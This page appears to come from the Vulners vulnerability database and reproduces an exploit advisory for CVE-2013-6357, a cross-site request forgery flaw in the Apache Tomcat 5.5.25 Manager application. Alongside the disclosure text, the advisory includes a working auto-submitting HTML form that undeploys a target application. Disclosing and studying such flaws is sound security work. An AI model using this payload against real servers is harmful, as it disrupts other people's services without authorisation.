Vulners
Lucene search
Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Apache Tomcat 5.5.25 CSRF Vulnerabilities | 4 Nov 201300:00 | – | zdt |
 | Security Bulletin: TADDM affected by multiple vulnerabilities due to Apache Tomcat libraries | 26 Mar 202503:33 | – | ibm |
 | CVE-2013-6357 | 13 Nov 201315:00 | – | cve |
 | CVE-2013-6357 | 13 Nov 201315:00 | – | cvelist |
 | Apache Tomcat 5.5.25 - Cross-Site Request Forgery | 4 Nov 201300:00 | – | exploitdb |
 | Apache Tomcat 5.5.25 - Cross-Site Request Forgery | 4 Nov 201300:00 | – | exploitpack |
 | CVE-2013-6357 | 13 Nov 201315:55 | – | nvd |
 | Apache Tomcat <= 5.5.25 CSRF Vulnerability - Linux | 18 Mar 202100:00 | – | openvas |
| Apache Tomcat <= 5.5.25 CSRF Vulnerability - Windows | 18 Mar 202100:00 | – | openvas |
 | Apache Tomcat 5.5.25 Cross Site Request Forgery | 4 Nov 201300:00 | – | packetstorm |
10
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Apache Tomcat 5.5.25 CSRF Vulnerabilities
# Date : 10-24-2013
# Author : Ivano Binetti (http://ivanobinetti.com)
# Author : Gianmarco Pirozzi (http://www.linkedin.com/pub/gianmarco-pirozzi/63/80b/2a5)
# Vendor site : http://tomcat.apache.org/
# Version : Apache Tomcat 5.5.25 and below (other versions could be affected)
# Tested on : Apache Tomcat 5.5.25
# Original Advisory : http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
# CVE-ID : CVE-2013-6357
+---------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerability Description
3)Exploit
3.1 Undeploy Applications
+---------------------------------------------------------------------------------------------------------------------------------+
1) Introduction
Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process.
2) Vulnerability Description
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability affecting the Manager application
(which is the component utilized to start/stop/deploy/undeploy applications) in order to perform the following malicious activities:
- stop an existing application
- undeploy an existing application
- deploy a new application
In this Advisory I will only demonstate how to automatically undeploy an existing application.
3) Exploit
3.1 Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
8High risk
Vulners AI Score8
EPSS0.00996